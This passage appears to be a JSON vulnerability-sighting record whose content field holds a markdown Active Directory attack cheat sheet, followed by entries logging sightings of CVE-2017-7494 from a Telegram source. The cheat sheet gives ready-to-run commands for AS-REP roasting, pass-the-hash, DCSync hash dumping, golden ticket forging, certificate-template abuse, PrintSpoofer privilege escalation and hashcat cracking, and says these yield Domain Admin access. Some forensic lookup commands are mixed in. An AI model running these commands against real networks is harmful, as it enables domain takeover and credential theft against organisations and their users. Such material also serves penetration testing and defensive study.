AS-REP Roasting (Crack Users Without Pre-Auth)\n\n```bash\n# Find and roast users with UF_DONT_REQUIRE_PREAUTH\npython3 GetNPUsers.py \\\n  -dc-ip 192.168.1.10 \\\n  corp.local/ \\\n  -targetusers \\\n  -request\n\n# Or specify domain and user\npython3 GetNPUsers.py \\\n  -dc-ip 192.168.1.10 \\\n  corp.local/user:password \\\n  -request\n\n# Crack with hashcat\nhashcat -m 18200 asrep.txt rockyou.txt\n```\n\n#### Example 5: Pass-the-Hash with impacket\n\n```bash\n# Authenticate with NTLM hash (no password needed)\n# WMI exec\npython3 wmiexec.py -hashes \"LM:NT\" corp.local/admin@192.168.1.100\n\n# PSEXEC style\npython3 psexec.py -hashes \"LM:NT\" corp.local/admin@192.168.1.100\n\n# DCSync (dump all domain hashes)\npython3 secretsdump.py -hashes \"LM:NT\" corp.local/admin@192.168.1.10\n\n# Gets:\n# krbtgt:!:... (golden ticket)\n# administrator:1000:... (domain admin)\n# All domain user hashes\n```\n\n#### Example 6: Golden Ticket (Forge Kerberos TGT)\n\n```bash\n# After DCSync, get krbtgt hash\n# Request TGT for any user\npython3 ticketer.py \\\n  -nthash  \\\n  -domain-sid  \\\n  -domain corp.local \\\n  administrator\n\n# This creates admin.ccache\n# Use it:\nexport KRB5CCNAME=admin.ccache\npython3 wmiexec.py -k corp.local/administrator@dc.corp.local\n\n# You now have Domain Admin access\n```\n\n### AD CS Attack Summary\n\n| Attack | What You Need | What You Get |\n|--------|--------------|--------------|\n| ESC1 (SAN Abuse) | Valid user + certificate template with SAN | Domain Admin |\n| ESC3 (RA Agent) | User enrollment + RA agent cert | Domain Admin |\n| Kerberoasting | Any user | Service account password |\n| AS-REP Roast | No pre-auth users | User password |\n| Pass-the-Hash | NTLM hash | Shell as that user |\n| DCSync | Domain Admin or krbtgt hash | All domain hashes |\n| Golden Ticket | krbtgt hash | Domain Admin (persistence) |\n\n---\n\n## Quick \"I Need To...\" Lookup\n\n| Task | Command |\n|------|---------|\n| Hunt attacker techniques in EVTX | `./chainsaw hunting ./evtx/ --json -o hits.json` |\n| Find logons in Windows logs | `./chainsaw search --event-id 4624 ./evtx/` |\n| Analyze PCAP for credentials | `tshark -r file.pcap -Y \"http.request.method == POST\" -T fields -e http.file_data` |\n| Extract files from PCAP | `tshark -r file.pcap --export-objects \"http,./export/\"` |\n| Find processes in memory dump | `vol -f mem.dmp windows.pslist` |\n| Crack NTLM hash | `hashcat -m 1000 hash.txt rockyou.txt` |\n| Crack Kerberos TGS | `hashcat -m 13100 ticket.txt rockyou.txt` |\n| Carve files from disk image | `binwalk -e disk.img` |\n| Extract hidden data from image | `steghide extract -sf image.jpg` |\n| Crack steghide password | `stegseek image.jpg rockyou.txt` |\n| Find admin logins in Linux | `grep \"Accepted\" /var/log/auth.log` |\n| Find web attacks in Apache | `grep -E \"UNION\\|SELECT\\|etc/passwd\" /var/log/apache2/access.log` |\n| Escalate Windows privs | `PrintSpoofer.exe -c \"cmd.exe /c whoami\"` |\n| Find SPN users in AD | `ldapsearch ... '(servicePrincipalName=*)'` |\n| Request cert as DA | `certipy-ad req -ca CA -template User -altname administrator@corp.local` |\n", "creation_timestamp": "2026-07-11T16:14:33.915436Z"}, {"uuid": "d6b31672-cbd2-4f44-8e05-0105cd08ddd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "Telegram/kQBPOJZRPfFE-rjb5OWBI31fcS08jxE2VBe_KgzBWEfjeHI", "content": "", "creation_timestamp": "2026-07-16T19:00:26.377896Z"}, {"uuid": "a9bbebef-edb2-4aed-b022-f54f30205e2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "Telegram/kQBPOJZRPfFE-rjb5OWBI31fcS08jxE2VBe_KgzBWEfjeHI", "content": "", "creation_timestamp": "2026-07-17T00:00:42.687934Z"}, {"uuid": "4a37950e-f904-4f48-8ad9-18aa91da572a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "published-proof-of-concept", "source": "Telegram/kQBPOJZRPfFE-rjb5OWBI31fcS08jxE2VBe_KgzBWEfjeHI", "content": "", "creation_timestamp": "2026-07-18T00:00:08.755161Z"}]}